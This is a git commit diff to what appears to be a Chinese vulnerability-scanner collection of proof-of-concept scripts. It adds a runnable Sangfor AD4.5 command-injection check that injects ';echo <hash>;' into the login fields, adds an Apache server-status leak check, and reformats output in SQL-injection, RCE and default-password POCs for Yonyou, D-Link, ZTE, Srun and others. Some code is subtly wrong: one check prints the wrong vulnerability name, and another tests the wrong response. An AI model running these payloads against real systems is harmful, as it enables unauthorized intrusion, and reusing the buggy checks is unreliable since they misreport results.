cms/yonyou/yonyou_status_default_pwd.py Normal file → Executable file
View File

@@ -28,7 +28,7 @@ class yonyou_status_default_pwd_BaseVerify:
vulnurl = self.url + payload vulnurl = self.url + payload
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"A8 Management Monitor" in req.text and r"Connections Stack Trace" in req.text: if r"A8 Management Monitor" in req.text and r"Connections Stack Trace" in req.text:
cprint("[+]存在用友a8监控后台默认密码漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在用友a8监控后台默认密码漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -30,7 +30,7 @@ class yonyou_u8_CmxItem_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在用友u8 CmxItem.php SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在用友u8 CmxItem.php SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -34,7 +34,7 @@ class router_dlink_command_exec_BaseVerify():
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"<report>OK" in req.text: if r"<report>OK" in req.text:
cprint("[+]存在Dlink DIAGNOSTIC.PHP命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在Dlink DIAGNOSTIC.PHP命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -28,7 +28,7 @@ class zte_wireless_getChannelByCountryCode_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"~~~" in req.text: if r"~~~" in req.text:
cprint("[+]存在zte 无线控制器 SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在zte 无线控制器 SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -0,0 +1,35 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: apache server-status信息泄露
referer: unknown
author: Lucifer
description: apache的状态信息文件泄露。
'''
import sys
import requests
import warnings
from termcolor import cprint
class apache_server_status_disclosure_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/server-status"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"Server uptime" in req.text and r"Server Status" in req.text and req.status_code==200:
cprint("[+]存在git源码泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
except:
cprint("[-] "+__file__+"====>连接超时", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = apache_server_status_disclosure_BaseVerify(sys.argv[1])
testVuln.run()

View File

@@ -10,4 +10,5 @@ from information.robots_find import robots_find_BaseVerify
from information.git_check import git_check_BaseVerify from information.git_check import git_check_BaseVerify
from information.jsp_conf_find import jsp_conf_find_BaseVerify from information.jsp_conf_find import jsp_conf_find_BaseVerify
from information.svn_check import svn_check_BaseVerify from information.svn_check import svn_check_BaseVerify
from information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify from information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
from information.apache_server_status_disclosure import apache_server_status_disclosure_BaseVerify

View File

@@ -22,7 +22,7 @@ class robots_find_BaseVerify:
req = requests.get(vulnurl, timeout=10, verify=False) req = requests.get(vulnurl, timeout=10, verify=False)
if "Disallow" in req.text: if "Disallow" in req.text:
cprint("[+]存在robots.txt爬虫文件...(敏感信息)", "green") cprint("[+]存在robots.txt爬虫文件...(敏感信息)"+"\tpayload: "+vulnurl, "green")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -20,6 +20,7 @@ class pocdb_pocs:
"robots文件发现":robots_find_BaseVerify(url), "robots文件发现":robots_find_BaseVerify(url),
"svn源码泄露扫描":svn_check_BaseVerify(url), "svn源码泄露扫描":svn_check_BaseVerify(url),
"JetBrains IDE workspace.xml文件泄露":jetbrains_ide_workspace_disclosure_BaseVerify(url), "JetBrains IDE workspace.xml文件泄露":jetbrains_ide_workspace_disclosure_BaseVerify(url),
"apache server-status信息泄露":apache_server_status_disclosure_BaseVerify(url),
} }
self.cmspocdict = { self.cmspocdict = {
"韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url), "韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url),
@@ -299,6 +300,7 @@ class pocdb_pocs:
"smtp starttls明文命令注入(CVE-2011-0411)":smtp_starttls_plaintext_inj_BaseVerify(url), "smtp starttls明文命令注入(CVE-2011-0411)":smtp_starttls_plaintext_inj_BaseVerify(url),
"resin viewfile 任意文件读取":resin_viewfile_fileread_BaseVerify(url), "resin viewfile 任意文件读取":resin_viewfile_fileread_BaseVerify(url),
"mongodb 未授权漏洞":mongodb_unauth_BaseVerify(url), "mongodb 未授权漏洞":mongodb_unauth_BaseVerify(url),
"深信服 AD4.5版本下命令执行漏洞":sangfor_ad_script_command_exec_BaseVerify(url),
} }
self.hardwarepocdict = { self.hardwarepocdict = {
"Dlink 本地文件包含":router_dlink_webproc_fileread_BaseVerify(url), "Dlink 本地文件包含":router_dlink_webproc_fileread_BaseVerify(url),

View File

@@ -34,10 +34,10 @@ class dorado_default_passwd_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"console.showSystemInfo.d" in req.text: if r"console.showSystemInfo.d" in req.text:
cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
req2 = requests.post(vulnurl, data=post_data2, headers=headers, timeout=10, verify=False) req2 = requests.post(vulnurl, data=post_data2, headers=headers, timeout=10, verify=False)
if r"console.showSystemInfo.d" in req.text: if r"console.showSystemInfo.d" in req.text:
cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data2), "red") cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data2, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

0
system/sangfor/__init__.py Executable file
View File

View File

@@ -0,0 +1,54 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 深信服 AD4.5版本下命令执行漏洞
referer: http://www.wooyun.org/bugs/wooyun-2016-0196014
author: Lucifer
description: 85端口两处命令执行参数userID和userPsw。
'''
import sys
import json
import requests
import warnings
from termcolor import cprint
class sangfor_ad_script_command_exec_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = ":85/report/script/login.php"
vulnurl = self.url + payload
post_data = {
"userID":"username;echo 81dc9bdb52d04dc20036dbd8313ed055;",
"log_type":"report",
"userPsw":"password",
"rnd":"0.8423849339596927"
}
post_data2 = {
"userID":"username",
"log_type":"report",
"userPsw":"password;echo d93591bdf7860e1e4ee2fca799911215;",
"rnd":"0.8423849339596927"
}
try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在深信服 AD4.5版本下命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
req = requests.post(vulnurl, data=post_data2, headers=headers, timeout=10, verify=False)
if r"d93591bdf7860e1e4ee2fca799911215" in req.text:
cprint("[+]存在深信服 AD4.5版本下命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data2, indent=4), "red")
except:
cprint("[-] "+__file__+"====>连接超时", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = sangfor_ad_script_command_exec_BaseVerify(sys.argv[1])
testVuln.run()

View File

@@ -29,7 +29,7 @@ class srun_index_file_filedownload_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"hostname" in req.text and r"clientver" in req.text: if r"hostname" in req.text and r"clientver" in req.text:
cprint("[+]存在深澜软件srun3000计费系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在深澜软件srun3000计费系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -31,7 +31,7 @@ class srun_rad_online_bypass_rce_BaseVerify:
shellurl = self.url + "/hit.txt" shellurl = self.url + "/hit.txt"
req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False) req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshellurl: "+shellurl, "red") cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshellurl: "+shellurl, "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -31,7 +31,7 @@ class srun_rad_online_username_rce_BaseVerify:
shellurl = self.url + "/hit.txt" shellurl = self.url + "/hit.txt"
req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False) req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshellurl: "+shellurl, "red") cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshellurl: "+shellurl, "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -26,7 +26,7 @@ class srun_user_info_uid_rce_BaseVerify:
shellurl = self.url + "/hit.txt" shellurl = self.url + "/hit.txt"
req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False) req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在深澜软件srun3000计费系统user_info.php命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellurl: "+shellurl, "red") cprint("[+]存在深澜软件srun3000计费系统user_info.php命令执行漏洞...(高危)\tpayload: "+vulnurl+"\nshellurl: "+shellurl, "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -73,4 +73,7 @@ from system.smtp.smtp_starttls_plaintext_inj import smtp_starttls_plaintext_inj_
from system.resin.resin_viewfile_fileread import resin_viewfile_fileread_BaseVerify from system.resin.resin_viewfile_fileread import resin_viewfile_fileread_BaseVerify
#mongodb vulns #mongodb vulns
from system.mongodb.mongodb_unauth import mongodb_unauth_BaseVerify from system.mongodb.mongodb_unauth import mongodb_unauth_BaseVerify
#sangfor vulns
from system.sangfor.sangfor_ad_script_command_exec import sangfor_ad_script_command_exec_BaseVerify

View File

@@ -8,6 +8,7 @@ description: TurboGate其实相当于TurboMail的早期版本TurboGate集成
在TurboGate中使用的是axis2<=1.5.1版本存在XXE漏洞在利用的时候需要将Content-Type设置为application/xml。 在TurboGate中使用的是axis2<=1.5.1版本存在XXE漏洞在利用的时候需要将Content-Type设置为application/xml。
''' '''
import sys import sys
import json
import requests import requests
import warnings import warnings
from termcolor import cprint from termcolor import cprint
@@ -27,7 +28,7 @@ class turbogate_services_xxe_BaseVerify():
try: try:
req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在TurboGate邮件网关XXE漏洞...(高危)\tpayload: "+vulnurl+"\t\tpost: "+post_data, "red") cprint("[+]存在TurboGate邮件网关XXE漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+post_data+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")